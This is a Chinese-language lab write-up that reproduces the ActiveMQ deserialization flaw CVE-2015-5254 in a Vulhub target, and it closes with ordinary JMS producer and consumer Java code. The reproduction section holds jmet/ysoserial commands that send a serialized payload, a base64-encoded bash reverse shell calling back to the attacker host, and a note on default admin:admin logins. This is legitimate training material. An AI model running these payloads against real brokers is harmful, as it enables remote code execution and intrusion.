ActiveMQ 反序列化漏洞（CVE-2015-5254）

漏洞原理

漏洞介绍：

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。

MQ(Message Queue)：消息队列/消息中间件。消息服务将消息放在队列／主题中，在
合适时候发给接收者。发送和接收是异步的（发送者和接收者的生命周期没有必然关系）。
- 队列：消息存在队列中，发送和接收都是异步的
- 主题：在发布pub／订阅sub模式下，发送消息给固定接收者（订阅过主题的），一对多的通信方式
MQ解决的问题：
- 解耦：新模块接入时，代码改动最小
- 消峰：设置流量缓冲池，让后端系统按照自身吞吐能力消费，不被冲垮
- 异步：强弱依赖梳理能将非关键调用链路的操作异步化，并提升整体系统的吞吐能力
产品种类：Kafka, RabbitMQ, RocketMQ, ActiveMQ
影响版本：Apache ActiveMQ version 5.13.0以前的5.x版本。
漏洞原因：该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
利用工具：

反弹shell：https://www.revshells.com/ （自带base64编码）

base64：https://base64.supfree.net/ （别用，辣鸡！！！） or http://tools.jb51.net/tools/base64_decode-utf8.php

jmet：https://github.com/matthiaskaiser/jmet

利用限制：

ActiveMQ版本不高于5.13.0
利用该漏洞上传payload需要人为触发才能执行，大概意思是需要执行该漏洞上传的payload才行
- 一种选择是该组件存在弱口令密码，可以使攻击者直接进入管理后台执行，执行payload的时间由攻击者掌握；
- 第二种选择就是该组件的管理员在进行后台管理时触发了payload，但这样执行payload的时间由管理员掌握

靶机实操

漏洞环境

ssh 连接靶场，进入靶场目录，打开该漏洞环境，并启动。

cd /mnt/vulhub-master
cd /activemq/CVE-2015-5254
docker-compose up -d

环境运行后，将监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递；8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面，不过这个漏洞理论上是不需要web的。

实验配置：

靶机地址：192.11.23.2:8161

攻击机：192.11.23.234(kali)

复现过程：

漏洞利用过程如下：

构造可执行命令的java序列化对象（ysoserial集合了各种java反序列化payload，而jmet集成了ysoserial）
将序列化对象作为一个消息，发送给目标61616工作端口
访问web管理页面，读取消息，触发漏洞（ActiveMQ Web管理页面默认账号密码是admin:admin）

使用jmet进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

ysoserial是一款java反序列化利用工具。

(1)kali上执行命令

java -jar jmet-0.1.0-all.jar -Q myevent -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.11.23.2 61616

-Q指定队列消息名，-I选择要装载的JMS客户端，这里是ActiveMQ，-s是选择ysoserial payload，-Y指定具体的命令，-Yp指定payload类型，其后分别是ActiveMQ所在机器的ip及工作端口所以这条命令是使用ROME payload把执行 touch /success 命令序列化后作为名为myevent的消息发送给ActiveMQ

执行此处命令后会给目标ActiveMQ加一个名为event的队列，可通过点击事件，触发远程命令.

此时只要在控制台点击查看该消息，就会在apache-activemq-5.11.1/tmp下面新建一个名为sucess的文件(如果看到该文件，说明在发消息的时候发送的恶意代码"touch /tmp/sucess"执行成功，漏洞利用成功)

(2)点击查看消息

(3)进入靶机bash

docker-compose exec activemq bash
cd /tmp
ls

如果看到该文件，说明在发消息的时候发送的恶意代码"touch /tmp/sucess"执行成功，漏洞利用成功

(4)反弹shell

去前面提到的在线反弹shell生成网站，生成一个反弹shell代码。

sh -i >& /dev/tcp/192.11.23.234/9001 0>&1

再进行base64加密：

c2glMjAtaSUyMCUzRSUyNiUyMC9kZXYvdGNwLzE5Mi4xMS4yMy4yMzQvOTAwMSUyMDAlM0UlMjYx（错的）
c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjExLjIzLjIzNC85MDAxIDA+JjE=

得到反弹shell的命令：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjExLjIzLjIzNC85MDAxIDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.11.23.2 61616

首先，在kali开启监听：nc -lvnp 9001(命令在反弹shell 网站右边)
其次，在kali上再开一个终端，执行最终的反弹shell命令。

我弹了100遍也没弹过来，一定是靶场问题（甩锅.jpg）

ps，后面发现原因，base64编码错误，有的网站会先url编码后，再base64.导致结果错误，payload不执行。（ref）

原payload

sh -i >& /dev/tcp/192.11.23.234/9001 0>&1

经过那个sb网站的base64（错误编码）：

c2glMjAtaSUyMCUzRSUyNiUyMC9kZXYvdGNwLzE5Mi4xMS4yMy4yMzQvOTAwMSUyMDAlM0UlMjYx

上其他网站解码：

sh%20-i%20%3E%26%20/dev/tcp/192.11.23.234/9001%200%3E%261

发现它对payload，先进行了url编码，再进行base64编码，导致payload不能执行。

修正payload后，成功弹回shell。

JAVA源代码测试ActiveMQ

https://blog.csdn.net/weixin_44232093/article/details/124849400

https://www.cnblogs.com/sallyzhang/p/12289983.html

生产者产生消息，加入队列

import org.apache.activemq.ActiveMQConnectionFactory;import javax.jms.*;public class JmsProduce {public static final String ACTIVEMQ_URL="tcp://192.11.23.2:61616";public static final String QUEUE_NAME="queue01";public static void main(String[] args) throws JMSException {//采用默认用户名和密码ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);Connection connection = activeMQConnectionFactory.createConnection();connection.start();Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);Queue queue = session.createQueue(QUEUE_NAME);MessageProducer messageProducer = session.createProducer(queue);//使用messageProducer生产3条消息发送到MQ队列for (int i=0;i<3;i++){TextMessage textMessage=session.createTextMessage("msg----"+i);messageProducer.send(textMessage);}messageProducer.close();session.close();connection.close();System.out.println("******消息发布到MQ完成******");}
}

消费者从队列中读取消息：

import org.apache.activemq.ActiveMQConnectionFactory;import javax.jms.*;public class JmsConsumer {public static final String ACTIVEMQ_URL = "tcp://localhost:61616";public static final String QUEUE_NAME = "queue01";public static void main(String[] args) throws JMSException {//采用默认用户名和密码ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);Connection connection = activeMQConnectionFactory.createConnection();connection.start();Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);Queue queue = session.createQueue(QUEUE_NAME);MessageConsumer messageConsumer = session.createConsumer(queue);while (true) {TextMessage textMessage = (TextMessage) messageConsumer.receive();if (textMessage != null) {System.out.println("******接收道消息:" + textMessage.getText());} else {break;}}messageConsumer.close();session.close();connection.close();}
}